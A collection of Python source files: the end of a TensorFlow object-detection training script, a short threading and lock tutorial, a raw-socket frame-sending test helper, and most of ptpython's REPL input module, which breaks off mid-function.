num_shards=num_shards,
num_examples_per_epoch=FLAGS.num_examples_per_epoch,
strategy=FLAGS.strategy,
backbone_ckpt=FLAGS.backbone_ckpt,
ckpt=FLAGS.ckpt,
val_json_file=FLAGS.val_json_file,
testdev_dir=FLAGS.testdev_dir,
profile=FLAGS.profile,
mode=FLAGS.mode)
config_proto = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False)
if FLAGS.strategy != 'tpu':
if FLAGS.use_xla:
config_proto.graph_options.optimizer_options.global_jit_level = (
tf.OptimizerOptions.ON_1)
config_proto.gpu_options.allow_growth = True
model_dir = FLAGS.model_dir
model_fn_instance = det_model_fn.get_model_fn(FLAGS.model_name)
max_instances_per_image = config.max_instances_per_image
if FLAGS.eval_samples:
eval_steps = int((FLAGS.eval_samples + FLAGS.eval_batch_size - 1) //
FLAGS.eval_batch_size)
else:
eval_steps = None
total_examples = int(config.num_epochs * FLAGS.num_examples_per_epoch)
train_steps = total_examples // FLAGS.train_batch_size
logging.info(params)
if not tf.io.gfile.exists(model_dir):
tf.io.gfile.makedirs(model_dir)
config_file = os.path.join(model_dir, 'config.yaml')
if not tf.io.gfile.exists(config_file):
tf.io.gfile.GFile(config_file, 'w').write(str(config))
train_input_fn = dataloader.InputReader(
FLAGS.training_file_pattern,
is_training=True,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image)
eval_input_fn = dataloader.InputReader(
FLAGS.validation_file_pattern,
is_training=False,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image)
if FLAGS.strategy == 'tpu':
tpu_config = tf.estimator.tpu.TPUConfig(
FLAGS.iterations_per_loop if FLAGS.strategy == 'tpu' else 1,
num_cores_per_replica=num_cores_per_replica,
input_partition_dims=input_partition_dims,
per_host_input_for_training=tf.estimator.tpu.InputPipelineConfig
.PER_HOST_V2)
run_config = tf.estimator.tpu.RunConfig(
cluster=tpu_cluster_resolver,
model_dir=model_dir,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
tpu_config=tpu_config,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tf_random_seed=FLAGS.tf_random_seed,
)
# TPUEstimator can do both train and eval.
train_est = tf.estimator.tpu.TPUEstimator(
model_fn=model_fn_instance,
train_batch_size=FLAGS.train_batch_size,
eval_batch_size=FLAGS.eval_batch_size,
config=run_config,
params=params)
eval_est = train_est
else:
strategy = None
if FLAGS.strategy == 'gpus':
strategy = tf.distribute.MirroredStrategy()
run_config = tf.estimator.RunConfig(
model_dir=model_dir,
train_distribute=strategy,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tf_random_seed=FLAGS.tf_random_seed,
)
def get_estimator(global_batch_size):
params['num_shards'] = getattr(strategy, 'num_replicas_in_sync', 1)
params['batch_size'] = global_batch_size // params['num_shards']
return tf.estimator.Estimator(
model_fn=model_fn_instance, config=run_config, params=params)
# train and eval need different estimator due to different batch size.
train_est = get_estimator(FLAGS.train_batch_size)
eval_est = get_estimator(FLAGS.eval_batch_size)
# start train/eval flow.
if FLAGS.mode == 'train':
train_est.train(input_fn=train_input_fn, max_steps=train_steps)
if FLAGS.eval_after_training:
eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
elif FLAGS.mode == 'eval':
# Run evaluation when there's a new checkpoint
for ckpt in tf.train.checkpoints_iterator(
FLAGS.model_dir,
min_interval_secs=FLAGS.min_eval_interval,
timeout=FLAGS.eval_timeout):
logging.info('Starting to evaluate.')
try:
eval_results = eval_est.evaluate(eval_input_fn, steps=eval_steps)
# Terminate eval job when final checkpoint is reached.
try:
current_step = int(os.path.basename(ckpt).split('-')[1])
except IndexError:
logging.info('%s has no global step info: stop!', ckpt)
break
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
if current_step >= train_steps:
logging.info('Eval finished step %d/%d', current_step, train_steps)
break
except tf.errors.NotFoundError:
# Checkpoint might be not already deleted by the time eval finished.
# We simply skip ssuch case.
logging.info('Checkpoint %s no longer exists, skipping.', ckpt)
elif FLAGS.mode == 'train_and_eval':
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
try:
step = int(os.path.basename(ckpt).split('-')[1])
current_epoch = (
step * FLAGS.train_batch_size // FLAGS.num_examples_per_epoch)
logging.info('found ckpt at step %d (epoch %d)', step, current_epoch)
except (IndexError, TypeError):
logging.info('Folder %s has no ckpt with valid step.', FLAGS.model_dir)
current_epoch = 0
def run_train_and_eval(e):
print('\n =====> Starting training, epoch: %d.' % e)
train_est.train(
input_fn=train_input_fn,
max_steps=e * FLAGS.num_examples_per_epoch // FLAGS.train_batch_size)
print('\n =====> Starting evaluation, epoch: %d.' % e)
eval_results = eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
epochs_per_cycle = 1 # higher number has less graph construction overhead.
for e in range(current_epoch + 1, config.num_epochs + 1, epochs_per_cycle):
if FLAGS.run_epoch_in_child_process:
p = multiprocessing.Process(target=run_train_and_eval, args=(e,))
p.start()
p.join()
if p.exitcode != 0:
return p.exitcode
else:
tf.compat.v1.reset_default_graph()
run_train_and_eval(e)
else:
logging.info('Invalid mode: %s', FLAGS.mode)
if __name__ == '__main__':
app.run(main)
|
Thread.py | import time, threading
def loop():
print(" thread %s is begin runging" %(threading.current_thread().name))
print(" thread %s run %d" % (threading.current_thread().name,i))
time.sleep(1)
print(" thread %s run %d end" % (threading.current_thread().name,i))
if __name__ =='__main__':
print(" thread %s is begin runging" %(threading.current_thread().name))
for i in range(3):
t=threading.Thread(target=loop,name='childThread')
t.start()
t.join()
print(" thread %s is end" %(threading.current_thread().name))
def change_it(n):
# 先存后取,结果应该为0:
global balance
balance = balance + n
balance = balance - n
print('current balance:%d'%(balance))
balance = 0
lock = threading.Lock()
def run_thread(n):
for i in range(10000):
# 先要获取锁:
lock.acquire()
try:
# 放心地改吧:
change_it(n)
finally:
# 改完了一定要释放锁:
lock.release()
run_thread(10) |
transport.py | import socket
import threading
from . import api
def send_flows(config: api.Config) -> None:
src = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
dst = socket.socket(
socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003)
)
f = config.flows[0]
src.bind((f.src_port, 0))
dst.bind((f.dst_port, 0))
t = threading.Thread(target=lambda: print(dst.recvfrom(65535)))
t.start()
src.send(f.frame_bytes)
t.join()
|
python_input.py | """
Application for reading Python input.
This can be used for creation of Python REPLs.
"""
import __future__
import threading
from asyncio import get_event_loop
from functools import partial
from typing import TYPE_CHECKING, Any, Callable, Dict, Generic, List, Optional, TypeVar
from prompt_toolkit.application import Application, get_app
from prompt_toolkit.auto_suggest import (
AutoSuggestFromHistory,
ConditionalAutoSuggest,
ThreadedAutoSuggest,
)
from prompt_toolkit.buffer import Buffer
from prompt_toolkit.completion import (
Completer,
DynamicCompleter,
FuzzyCompleter,
ThreadedCompleter,
)
from prompt_toolkit.document import Document
from prompt_toolkit.enums import DEFAULT_BUFFER, EditingMode
from prompt_toolkit.filters import Condition
from prompt_toolkit.formatted_text import AnyFormattedText
from prompt_toolkit.history import (
FileHistory,
History,
InMemoryHistory,
ThreadedHistory,
)
from prompt_toolkit.input import Input
from prompt_toolkit.key_binding import (
ConditionalKeyBindings,
KeyBindings,
merge_key_bindings,
)
from prompt_toolkit.key_binding.bindings.auto_suggest import load_auto_suggest_bindings
from prompt_toolkit.key_binding.bindings.open_in_editor import (
load_open_in_editor_bindings,
)
from prompt_toolkit.key_binding.vi_state import InputMode
from prompt_toolkit.lexers import DynamicLexer, Lexer, SimpleLexer
from prompt_toolkit.output import ColorDepth, Output
from prompt_toolkit.styles import (
AdjustBrightnessStyleTransformation,
BaseStyle,
ConditionalStyleTransformation,
DynamicStyle,
SwapLightAndDarkStyleTransformation,
merge_style_transformations,
)
from prompt_toolkit.utils import is_windows
from prompt_toolkit.validation import ConditionalValidator, Validator
from .completer import CompletePrivateAttributes, HidePrivateCompleter, PythonCompleter
from .history_browser import PythonHistory
from .key_bindings import (
load_confirm_exit_bindings,
load_python_bindings,
load_sidebar_bindings,
)
from .layout import CompletionVisualisation, PtPythonLayout
from .lexer import PtpythonLexer
from .prompt_style import ClassicPrompt, IPythonPrompt, PromptStyle
from .style import generate_style, get_all_code_styles, get_all_ui_styles
from .utils import get_jedi_script_from_document, unindent_code
from .validator import PythonValidator
__all__ = ["PythonInput"]
if TYPE_CHECKING:
from typing_extensions import Protocol
class _SupportsLessThan(Protocol):
# Taken from typeshed. _T is used by "sorted", which needs anything
# sortable.
def __lt__(self, __other: Any) -> bool:
...
_T = TypeVar("_T", bound="_SupportsLessThan")
class OptionCategory:
def __init__(self, title: str, options: List["Option"]) -> None:
self.title = title
self.options = options
class Option(Generic[_T]):
"""
Ptpython configuration option that can be shown and modified from the
sidebar.
:param title: Text.
:param description: Text.
:param get_values: Callable that returns a dictionary mapping the
possible values to callbacks that activate these value.
:param get_current_value: Callable that returns the current, active value.
"""
def __init__(
self,
title: str,
description: str,
get_current_value: Callable[[], _T],
# We accept `object` as return type for the select functions, because
# often they return an unused boolean. Maybe this can be improved.
get_values: Callable[[], Dict[_T, Callable[[], object]]],
) -> None:
self.title = title
self.description = description
self.get_current_value = get_current_value
self.get_values = get_values
@property
def values(self) -> Dict[_T, Callable[[], object]]:
return self.get_values()
def activate_next(self, _previous: bool = False) -> None:
"""
Activate next value.
"""
current = self.get_current_value()
options = sorted(self.values.keys())
# Get current index.
try:
index = options.index(current)
except ValueError:
index = 0
# Go to previous/next index.
if _previous:
index -= 1
else:
index += 1
# Call handler for this option.
next_option = options[index % len(options)]
self.values[next_option]()
def activate_previous(self) -> None:
"""
Activate previous value.
"""
self.activate_next(_previous=True)
COLOR_DEPTHS = {
ColorDepth.DEPTH_1_BIT: "Monochrome",
ColorDepth.DEPTH_4_BIT: "ANSI Colors",
ColorDepth.DEPTH_8_BIT: "256 colors",
ColorDepth.DEPTH_24_BIT: "True color",
}
_Namespace = Dict[str, Any]
_GetNamespace = Callable[[], _Namespace]
class PythonInput:
"""
Prompt for reading Python input.
::
python_input = PythonInput(...)
python_code = python_input.app.run()
"""
def __init__(
self,
get_globals: Optional[_GetNamespace] = None,
get_locals: Optional[_GetNamespace] = None,
history_filename: Optional[str] = None,
vi_mode: bool = False,
color_depth: Optional[ColorDepth] = None,
# Input/output.
input: Optional[Input] = None,
output: Optional[Output] = None,
# For internal use.
extra_key_bindings: Optional[KeyBindings] = None,
_completer: Optional[Completer] = None,
_validator: Optional[Validator] = None,
_lexer: Optional[Lexer] = None,
_extra_buffer_processors=None,
_extra_layout_body=None,
_extra_toolbars=None,
_input_buffer_height=None,
) -> None:
self.get_globals: _GetNamespace = get_globals or (lambda: {})
self.get_locals: _GetNamespace = get_locals or self.get_globals
self.completer = _completer or PythonCompleter(
self.get_globals,
self.get_locals,
lambda: self.enable_dictionary_completion,
)
self._completer = HidePrivateCompleter(
FuzzyCompleter(
DynamicCompleter(lambda: self.completer),
enable_fuzzy=Condition(lambda: self.enable_fuzzy_completion),
),
lambda: self.complete_private_attributes,
)
self._validator = _validator or PythonValidator(self.get_compiler_flags)
self._lexer = PtpythonLexer(_lexer)
self.history: History
if history_filename:
self.history = ThreadedHistory(FileHistory(history_filename))
else:
self.history = InMemoryHistory()
self._input_buffer_height = _input_buffer_height
self._extra_layout_body = _extra_layout_body or []
self._extra_toolbars = _extra_toolbars or []
self._extra_buffer_processors = _extra_buffer_processors or []
self.extra_key_bindings = extra_key_bindings or KeyBindings()
# Settings.
self.title: AnyFormattedText = ""
self.show_signature: bool = False
self.show_docstring: bool = False
self.show_meta_enter_message: bool = True
self.completion_visualisation: CompletionVisualisation = (
CompletionVisualisation.MULTI_COLUMN
)
self.completion_menu_scroll_offset: int = 1
self.show_line_numbers: bool = False
self.show_status_bar: bool = True
self.wrap_lines: bool = True
self.complete_while_typing: bool = True
self.paste_mode: bool = (
False # When True, don't insert whitespace after newline.
)
self.confirm_exit: bool = (
True # Ask for confirmation when Control-D is pressed.
)
self.accept_input_on_enter: int = 2 # Accept when pressing Enter 'n' times.
# 'None' means that meta-enter is always required.
self.enable_open_in_editor: bool = True
self.enable_system_bindings: bool = True
self.enable_input_validation: bool = True
self.enable_auto_suggest: bool = False
self.enable_mouse_support: bool = False
self.enable_history_search: bool = False # When True, like readline, going
# back in history will filter the
# history on the records starting
# with the current input.
self.enable_syntax_highlighting: bool = True
self.enable_fuzzy_completion: bool = False
self.enable_dictionary_completion: bool = False
self.complete_private_attributes: CompletePrivateAttributes = (
CompletePrivateAttributes.ALWAYS
)
self.swap_light_and_dark: bool = False
self.highlight_matching_parenthesis: bool = False
self.show_sidebar: bool = False # Currently show the sidebar.
# Pager.
self.enable_output_formatting: bool = False
self.enable_pager: bool = False
# When the sidebar is visible, also show the help text.
self.show_sidebar_help: bool = True
# Currently show 'Do you really want to exit?'
self.show_exit_confirmation: bool = False
# The title to be displayed in the terminal. (None or string.)
self.terminal_title: Optional[str] = None
self.exit_message: str = "Do you really want to exit?"
self.insert_blank_line_after_output: bool = True # (For the REPL.)
self.insert_blank_line_after_input: bool = False # (For the REPL.)
# The buffers.
self.default_buffer = self._create_buffer()
self.search_buffer: Buffer = Buffer()
self.docstring_buffer: Buffer = Buffer(read_only=True)
# Tokens to be shown at the prompt.
self.prompt_style: str = "classic" # The currently active style.
# Styles selectable from the menu.
self.all_prompt_styles: Dict[str, PromptStyle] = {
"ipython": IPythonPrompt(self),
"classic": ClassicPrompt(),
}
self.get_input_prompt = lambda: self.all_prompt_styles[
self.prompt_style
].in_prompt()
self.get_output_prompt = lambda: self.all_prompt_styles[
self.prompt_style
].out_prompt()
#: Load styles.
self.code_styles: Dict[str, BaseStyle] = get_all_code_styles()
self.ui_styles = get_all_ui_styles()
self._current_code_style_name: str = "default"
self._current_ui_style_name: str = "default"
if is_windows():
self._current_code_style_name = "win32"
self._current_style = self._generate_style()
self.color_depth: ColorDepth = color_depth or ColorDepth.default()
self.max_brightness: float = 1.0
self.min_brightness: float = 0.0
# Options to be configurable from the sidebar.
self.options = self._create_options()
self.selected_option_index: int = 0
#: Incremeting integer counting the current statement.
self.current_statement_index: int = 1
# Code signatures. (This is set asynchronously after a timeout.)
self.signatures: List[Any] = []
# Boolean indicating whether we have a signatures thread running.
# (Never run more than one at the same time.)
self._get_signatures_thread_running: bool = False
# Get into Vi navigation mode at startup
self.vi_start_in_navigation_mode: bool = False
# Preserve last used Vi input mode between main loop iterations
self.vi_keep_last_used_mode: bool = False
self.style_transformation = merge_style_transformations(
[
ConditionalStyleTransformation(
SwapLightAndDarkStyleTransformation(),
filter=Condition(lambda: self.swap_light_and_dark),
),
AdjustBrightnessStyleTransformation(
lambda: self.min_brightness, lambda: self.max_brightness
),
]
)
self.ptpython_layout = PtPythonLayout(
self,
lexer=DynamicLexer(
lambda: self._lexer
if self.enable_syntax_highlighting
else SimpleLexer()
),
input_buffer_height=self._input_buffer_height,
extra_buffer_processors=self._extra_buffer_processors,
extra_body=self._extra_layout_body,
extra_toolbars=self._extra_toolbars,
)
self.app = self._create_application(input, output)
if vi_mode:
self.app.editing_mode = EditingMode.VI
def _accept_handler(self, buff: Buffer) -> bool:
app = get_app()
app.exit(result=buff.text)
app.pre_run_callables.append(buff.reset)
return True # Keep text, we call 'reset' later on.
@property
def option_count(self) -> int:
" Return the total amount of options. (In all categories together.) "
return sum(len(category.options) for category in self.options)
@property
def selected_option(self) -> Option:
" Return the currently selected option. "
i = 0
for category in self.options:
for o in category.options:
if i == self.selected_option_index:
return o
else:
i += 1
raise ValueError("Nothing selected")
def get_compiler_flags(self) -> int:
"""
Give the current compiler flags by looking for _Feature instances
in the globals.
"""
flags = 0
for value in self.get_globals().values():
try:
if isinstance(value, __future__._Feature):
f = value.compiler_flag
flags |= f
except BaseException:
# get_compiler_flags should never raise to not run into an
# `Unhandled exception in event loop`
# See: https://github.com/prompt-toolkit/ptpython/issues/351
# An exception can be raised when some objects in the globals
# raise an exception in a custom `__getattribute__`.
pass
return flags
@property
def add_key_binding(self) -> Callable[[_T], _T]:
"""
Shortcut for adding new key bindings.
(Mostly useful for a config.py file, that receives
a PythonInput/Repl instance as input.)
::
@python_input.add_key_binding(Keys.ControlX, filter=...)
def handler(event):
...
"""
def add_binding_decorator(*k, **kw):
return self.extra_key_bindings.add(*k, **kw)
return add_binding_decorator
def install_code_colorscheme(self, name: str, style: BaseStyle) -> None:
"""
Install a new code color scheme.
"""
self.code_styles[name] = style
def use_code_colorscheme(self, name: str) -> None:
"""
Apply new colorscheme. (By name.)
"""
assert name in self.code_styles
self._current_code_style_name = name
self._current_style = self._generate_style()
def install_ui_colorscheme(self, name: str, style: BaseStyle) -> None:
"""
Install a new UI color scheme.
"""
self.ui_styles[name] = style
def use_ui_colorscheme(self, name: str) -> None:
"""
Apply new colorscheme. (By name.)
"""
assert name in self.ui_styles
self._current_ui_style_name = name
self._current_style = self._generate_style()
def _use_color_depth(self, depth: ColorDepth) -> None:
self.color_depth = depth
def _set_min_brightness(self, value: float) -> None:
self.min_brightness = value
self.max_brightness = max(self.max_brightness, value)
def _set_max_brightness(self, value: float) -> None:
self.max_brightness = value
self.min_brightness = min(self.min_brightness, value)
def _generate_style(self) -> BaseStyle:
"""
Create new Style instance.
(We don't want to do this on every key press, because each time the
renderer receives a new style class, he will redraw everything.)
"""
return generate_style(
self.code_styles[self._current_code_style_name],
self.ui_styles[self._current_ui_style_name],
)
def _create_options(self) -> List[OptionCategory]:
"""
Create a list of `Option` instances for the options sidebar.
"""
def enable(attribute: str, value: Any = True) -> bool:
setattr(self, attribute, value)
# Return `True`, to be able to chain this in the lambdas below.
return True
def disable(attribute: str) -> bool:
setattr(self, attribute, False)
return True
def simple_option(
title: str, description: str, field_name: str, values: Optional[List] = None
) -> Option:
" Create Simple on/of option. "
values = values or ["off", "on"]
def get_current_value():
return values[bool(getattr(self, field_name))]
def get_values():
return {
values[1]: lambda: enable(field_name),
values[0]: lambda: disable(field_name),
}
return Option(
title=title,
description=description,
get_values=get_values,
get_current_value=get_current_value,
)
brightness_values = [1.0 / 20 * value for value in range(0, 21)]
return [
OptionCategory(
"Input",
[
Option(
title="Editing mode",
description="Vi or emacs key bindings.",
get_current_value=lambda: ["Emacs", "Vi"][self.vi_mode],
get_values=lambda: {
"Emacs": lambda: disable("vi_mode"),
"Vi": lambda: enable("vi_mode"),
},
),
simple_option(
title="Paste mode",
description="When enabled, don't indent automatically.",
field_name="paste_mode",
),
Option(
title="Complete while typing",
description="Generate autocompletions automatically while typing. "
'Don\'t require pressing TAB. (Not compatible with "History search".)',
get_current_value=lambda: ["off", "on"][
self.complete_while_typing
],
get_values=lambda: {
"on": lambda: enable("complete_while_typing")
and disable("enable_history_search"),
"off": lambda: disable("complete_while_typing"),
},
),
Option(
title="Complete private attrs",
description="Show or hide private attributes in the completions. "
"'If no public' means: show private attributes only if no public "
"matches are found or if an underscore was typed.",
get_current_value=lambda: {
CompletePrivateAttributes.NEVER: "Never",
CompletePrivateAttributes.ALWAYS: "Always",
CompletePrivateAttributes.IF_NO_PUBLIC: "If no public",
}[self.complete_private_attributes],
get_values=lambda: {
"Never": lambda: enable(
"complete_private_attributes",
CompletePrivateAttributes.NEVER,
),
"Always": lambda: enable(
"complete_private_attributes",
CompletePrivateAttributes.ALWAYS,
),
"If no public": lambda: enable(
"complete_private_attributes",
CompletePrivateAttributes.IF_NO_PUBLIC,
),
},
),
Option(
title="Enable fuzzy completion",
description="Enable fuzzy completion.",
get_current_value=lambda: ["off", "on"][
self.enable_fuzzy_completion
],
get_values=lambda: {
"on": lambda: enable("enable_fuzzy_completion"),
"off": lambda: disable("enable_fuzzy_completion"),
},
),
Option(
title="Dictionary completion",
description="Enable experimental dictionary/list completion.\n"
'WARNING: this does "eval" on fragments of\n'
" your Python input and is\n"
" potentially unsafe.",
get_current_value=lambda: ["off", "on"][
self.enable_dictionary_completion
],
get_values=lambda: {
"on": lambda: enable("enable_dictionary_completion"),
"off": lambda: disable("enable_dictionary_completion"),
},
),
Option(
title="History search",
description="When pressing the up-arrow, filter the history on input starting "
'with the current text. (Not compatible with "Complete while typing".)',
get_current_value=lambda: ["off", "on"][
self.enable_history_search
],
get_values=lambda: {
"on": lambda: enable("enable_history_search")
and disable("complete_while_typing"),
"off": lambda: disable("enable_history_search"),
},
),
simple_option(
title="Mouse support",
description="Respond to mouse clicks and scrolling for positioning the cursor, "
"selecting text and scrolling through windows.",
field_name="enable_mouse_support",
),
simple_option(
title="Confirm on exit",
description="Require confirmation when exiting.",
field_name="confirm_exit",
),
simple_option(
title="Input validation",
description="In case of syntax errors, move the cursor to the error "
"instead of showing a traceback of a SyntaxError.",
field_name="enable_input_validation",
),
simple_option(
title="Auto suggestion",
description="Auto suggest inputs by looking at the history. "
"Pressing right arrow or Ctrl-E will complete the entry.",
field_name="enable_auto_suggest",
),
Option(
title="Accept input on enter",
description="Amount of ENTER presses required to execute input when the cursor "
"is at the end of the input. (Note that META+ENTER will always execute.)",
get_current_value=lambda: str(
self.accept_input_on_enter or "meta-enter"
),
get_values=lambda: {
"2": lambda: enable("accept_input_on_enter", 2),
"3": lambda: enable("accept_input_on_enter", 3),
"4": lambda: enable("accept_input_on_enter", 4),
"meta-enter": lambda: enable("accept_input_on_enter", None),
},
),
],
),
OptionCategory(
"Display",
[
Option(
title="Completions",
description="Visualisation to use for displaying the completions. (Multiple columns, one column, a toolbar or nothing.)",
get_current_value=lambda: self.completion_visualisation.value,
get_values=lambda: {
CompletionVisualisation.NONE.value: lambda: enable(
"completion_visualisation", CompletionVisualisation.NONE
),
CompletionVisualisation.POP_UP.value: lambda: enable(
"completion_visualisation",
CompletionVisualisation.POP_UP,
),
CompletionVisualisation.MULTI_COLUMN.value: lambda: enable(
"completion_visualisation",
CompletionVisualisation.MULTI_COLUMN,
),
CompletionVisualisation.TOOLBAR.value: lambda: enable(
"completion_visualisation",
CompletionVisualisation.TOOLBAR,
),
},
),
Option(
title="Prompt",
description="Visualisation of the prompt. ('>>>' or 'In [1]:')",
get_current_value=lambda: self.prompt_style,
get_values=lambda: dict(
(s, partial(enable, "prompt_style", s))
for s in self.all_prompt_styles
),
),
simple_option(
title="Blank line after input",
description="Insert a blank line after the input.",
field_name="insert_blank_line_after_input",
),
simple_option(
title="Blank line after output",
description="Insert a blank line after the output.",
field_name="insert_blank_line_after_output",
),
simple_option(
title="Show signature",
description="Display function signatures.",
field_name="show_signature",
),
simple_option(
title="Show docstring",
description="Display function docstrings.",
field_name="show_docstring",
),
simple_option(
title="Show line numbers",
description="Show line numbers when the input consists of multiple lines.",
field_name="show_line_numbers",
),
simple_option(
title="Show Meta+Enter message",
description="Show the [Meta+Enter] message when this key combination is required to execute commands. "
+ "(This is the case when a simple [Enter] key press will insert a newline.",
field_name="show_meta_enter_message",
),
simple_option(
title="Wrap lines",
description="Wrap lines instead of scrolling horizontally.",
field_name="wrap_lines",
),
simple_option(
title="Show status bar",
description="Show the status bar at the bottom of the terminal.",
field_name="show_status_bar",
),
simple_option(
title="Show sidebar help",
description="When the sidebar is visible, also show this help text.",
field_name="show_sidebar_help",
),
simple_option(
title="Highlight parenthesis",
description="Highlight matching parenthesis, when the cursor is on or right after one.",
field_name="highlight_matching_parenthesis",
),
simple_option(
title="Reformat output (black)",
description="Reformat outputs using Black, if possible (experimental).",
field_name="enable_output_formatting",
),
simple_option(
title="Enable pager for output",
description="Use a pager for displaying outputs that don't "
"fit on the screen.",
field_name="enable_pager",
),
],
),
OptionCategory(
"Colors",
[
simple_option(
title="Syntax highlighting",
description="Use colors for syntax highligthing",
field_name="enable_syntax_highlighting",
),
simple_option(
title="Swap light/dark colors",
description="Swap light and dark colors.",
field_name="swap_light_and_dark",
),
Option(
title="Code",
description="Color scheme to use for the Python code.",
get_current_value=lambda: self._current_code_style_name,
get_values=lambda: {
name: partial(self.use_code_colorscheme, name)
for name in self.code_styles
},
),
Option(
title="User interface",
description="Color scheme to use for the user interface.",
get_current_value=lambda: self._current_ui_style_name,
get_values=lambda: dict(
(name, partial(self.use_ui_colorscheme, name))
for name in self.ui_styles
),
),
Option(
title="Color depth",
description="Monochrome (1 bit), 16 ANSI colors (4 bit),\n256 colors (8 bit), or 24 bit.",
get_current_value=lambda: COLOR_DEPTHS[self.color_depth],
get_values=lambda: {
name: partial(self._use_color_depth, depth)
for depth, name in COLOR_DEPTHS.items()
},
),
Option(
title="Min brightness",
description="Minimum brightness for the color scheme (default=0.0).",
get_current_value=lambda: "%.2f" % self.min_brightness,
get_values=lambda: {
"%.2f" % value: partial(self._set_min_brightness, value)
for value in brightness_values
},
),
Option(
title="Max brightness",
description="Maximum brightness for the color scheme (default=1.0).",
get_current_value=lambda: "%.2f" % self.max_brightness,
get_values=lambda: {
"%.2f" % value: partial(self._set_max_brightness, value)
for value in brightness_values
},
),
],
),
]
def _create_application(
self, input: Optional[Input], output: Optional[Output]
) -> Application:
"""
Create an `Application` instance.
"""
return Application(
layout=self.ptpython_layout.layout,
key_bindings=merge_key_bindings(
[
load_python_bindings(self),
load_auto_suggest_bindings(),
load_sidebar_bindings(self),
load_confirm_exit_bindings(self),
ConditionalKeyBindings(
load_open_in_editor_bindings(),
Condition(lambda: self.enable_open_in_editor),
),
# Extra key bindings should not be active when the sidebar is visible.
ConditionalKeyBindings(
self.extra_key_bindings,
Condition(lambda: not self.show_sidebar),
),
]
),
color_depth=lambda: self.color_depth,
paste_mode=Condition(lambda: self.paste_mode),
mouse_support=Condition(lambda: self.enable_mouse_support),
style=DynamicStyle(lambda: self._current_style),
style_transformation=self.style_transformation,
include_default_pygments_style=False,
reverse_vi_search_direction=True,
input=input,
output=output,
)
def _create_buffer(self) -> Buffer:
"""
Create the `Buffer` for the Python input.
"""
python_buffer = Buffer(
name=DEFAULT_BUFFER,
complete_while_typing=Condition(lambda: self.complete_while_typing),
enable_history_search=Condition(lambda: self.enable_history_search),
tempfile_suffix=".py",
history=self.history,
completer=ThreadedCompleter(self._completer),
validator=ConditionalValidator(
self._validator, Condition(lambda: self.enable_input_validation)
),
auto_suggest=ConditionalAutoSuggest(
ThreadedAutoSuggest(AutoSuggestFromHistory()),
Condition(lambda: self.enable_auto_suggest),
),
accept_handler=self._accept_handler,
on_text_changed=self._on_input_timeout,
)
return python_buffer
@property
def editing_mode(self) -> EditingMode:
return self.app.editing_mode
@editing_mode.setter
def editing_mode(self, value: EditingMode) -> None:
self.app.editing_mode = value
@property
def vi_mode(self) -> bool:
return self.editing_mode == EditingMode.VI
@vi_mode.setter
def vi_mode(self, value: bool) -> None:
if value:
self.editing_mode = EditingMode.VI
else:
self.editing_mode = EditingMode.EMACS
def _on_input_timeout(self, buff: Buffer, loop=None) -> None:
"""
When there is no input activity,
in another thread, get the signature of the current code.
"""
app = self.app
# Never run multiple get-signature threads.
if self._get_signatures_thread_running:
return
self._get_signatures_thread_running = True
document = buff.document
loop = loop or get_event_loop()
def run():
script = get_jedi_script_from_document(
document, self.get_locals(), self.get_globals()
)
# Show signatures in help text.
if script:
try:
signatures = script.get_signatures()
except ValueError:
# e.g. in case of an invalid \\x escape.
signatures = []
except Exception:
# Sometimes we still get an exception (TypeError), because
# of probably bugs in jedi. We can silence them.
# See: https://github.com/davidhalter/jedi/issues/492
signatures = []
else:
# Try to access the params attribute just once. For Jedi
# signatures containing the keyword-only argument star,
# this will crash when retrieving it the first time with
# AttributeError. Every following time it works.
# See: https://github.com/jonathanslenders/ptpython/issues/47
# https://github.com/davidhalter/jedi/issues/598
try:
if signatures:
signatures[0].params
except AttributeError:
pass
else:
signatures = []
self._get_signatures_thread_running = False
# Set signatures and redraw if the text didn't change in the
# meantime. Otherwise request new signatures.
if buff.text == document.text:
self.signatures = signatures
# Set docstring in docstring buffer.
if signatures:
string = signatures[0].docstring()
if not isinstance(string, str):
string = string.decode("utf-8")
self.docstring_buffer.reset(
document=Document(string, cursor_position=0)
)
else:
self.docstring_buffer.reset()
app.invalidate()
else:
self._on_input_timeout(buff, loop=loop)
loop.run_in_executor(None, run)
def on_reset(self) -> None:
self.signatures = []
def enter_history(self) -> None:
"""
Display the history.
"""
app = get_app()
app.vi_state.input_mode = InputMode.NAVIGATION
history = PythonHistory(self, self.default_buffer.document)
import asyncio
from prompt_toolkit.application import in_terminal
async def do_in_terminal() -> None:
async with in_terminal():
result = await history.app.run_async()
if result is not None:
self.default_buffer.text = result
app.vi_state.input_mode = InputMode.INSERT
asyncio.ensure_future(do_in_terminal())
def read(self) -> str:
"""
Read the input.
This will run the Python input user interface in another thread, wait
for input to be accepted and return that. By running the UI in another
thread, we avoid issues regarding possibly nested event loops.
This can raise EOFError, when Control-D is pressed.
"""
# Capture the current input_mode in order to restore it after reset,
# for ViState.reset() sets it to InputMode.INSERT unconditionally and
# doesn't accept any arguments.
def pre_run(
last_input_mode: InputMode = self.app.vi_state.input_mode,
) -> None:
if self.vi_keep_last_used_mode:
self.app.vi_state.input_mode = last_input_mode
if not self.vi_keep_last_used_mode and self.vi_start_in_navigation_mode:
self.app.vi_state.input_mode = InputMode.NAVIGATION
# Run the UI.
result: str = ""
exception: Optional[BaseException] = None
def in_thread() -> None:
nonlocal result, exception
try:
while True:
try:
result = self.app.run(pre_run=pre_run)
if result.lstrip().startswith("\x1a"):
# When the input starts with Ctrl-Z, quit the REPL.
# (Important for Windows users.)
raise EOFError
# Remove leading whitespace.
# (Users can add extra indentation, which happens for
# instance because of copy/pasting code.)
result = unindent_code(result)
if result and not result.isspace():
return
except KeyboardInterrupt:
# Abort - try again.
